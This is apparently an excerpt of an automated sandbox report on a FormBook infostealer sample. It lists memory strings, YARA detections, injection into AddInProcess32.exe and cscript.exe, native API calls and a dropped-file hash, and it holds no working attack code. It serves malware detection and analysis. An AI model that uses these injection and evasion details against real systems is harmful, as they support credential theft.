          Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: bXFjrxjRlb.exe, 00000000.00000003.349237983.000000000802D000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsofB
          Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
          Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
          Source: bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
          Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
          Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
          Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
          Source: bXFjrxjRlb.exe, 00000000.00000002.356197969.000000000254F000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
          Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: cscript.exe, 00000007.00000002.702464960.000000000518F000.00000004.00000001.sdmpString found in binary or memory: http://www.thehostingroad.com/cgi-sys/suspendedpage.cgi?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmpString found in binary or memory: https://pki.goog/repository/0
          Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
          Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmpString found in binary or memory: https://www.google.comT
          Source: bXFjrxjRlb.exe, 00000000.00000002.355982660.00000000008CB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419D70 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419E20 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419EA0 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419F50 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419E1A NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013795F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013799D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01379A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013796D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047DAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047DA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047DA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047DB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047DA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003E9D70 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003E9E20 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003E9EA0 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003E9F50 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003E9E1A NtReadFile,
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_00B7C9A8
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_00B7EBD2
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_00B7D4A2
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_00B76E20
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_00B72648
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_00B767E8
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_00B79F20
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_069C2790
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_069C0788
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_069C85F0
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_069CCE38
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_069C1F91
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_069C2780
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_069C0778
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_069CCE28
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_069C7C10
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 0_2_069C7C48
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041D25B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00402D8B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00409E40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_009E2050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01330D20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01401D55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01354120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133F900
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01402D07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_014025DD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01362581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134841F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1002
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013FD466
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B090
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_014028EC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_014020A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01402B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136EBB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01401FF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013FDBD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01356E30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01402EF7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_014022AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485D466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04790D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048625DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04862D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AD5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04861D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C2581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B6E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04862EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485D616
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0486DFCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04861FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048620A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048628EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0486E824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AB090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B4120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048622AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485DBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048503DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04862B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CEBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003D2D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003D2D8B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003D9E40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003D2FB0
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0479B150 appears 45 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0133B150 appears 35 times
          Source: bXFjrxjRlb.exeBinary or memory string: OriginalFilename vs bXFjrxjRlb.exe
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs bXFjrxjRlb.exe
          Source: bXFjrxjRlb.exe, 00000000.00000002.356213090.000000000256A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs bXFjrxjRlb.exe
          Source: bXFjrxjRlb.exe, 00000000.00000002.360888475.00000000056E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs bXFjrxjRlb.exe
          Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs bXFjrxjRlb.exe
          Source: bXFjrxjRlb.exe, 00000000.00000002.355982660.00000000008CB000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs bXFjrxjRlb.exe
          Source: bXFjrxjRlb.exeBinary or memory string: OriginalFilenameIMG_155710.exeL vs bXFjrxjRlb.exe
          Source: bXFjrxjRlb.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
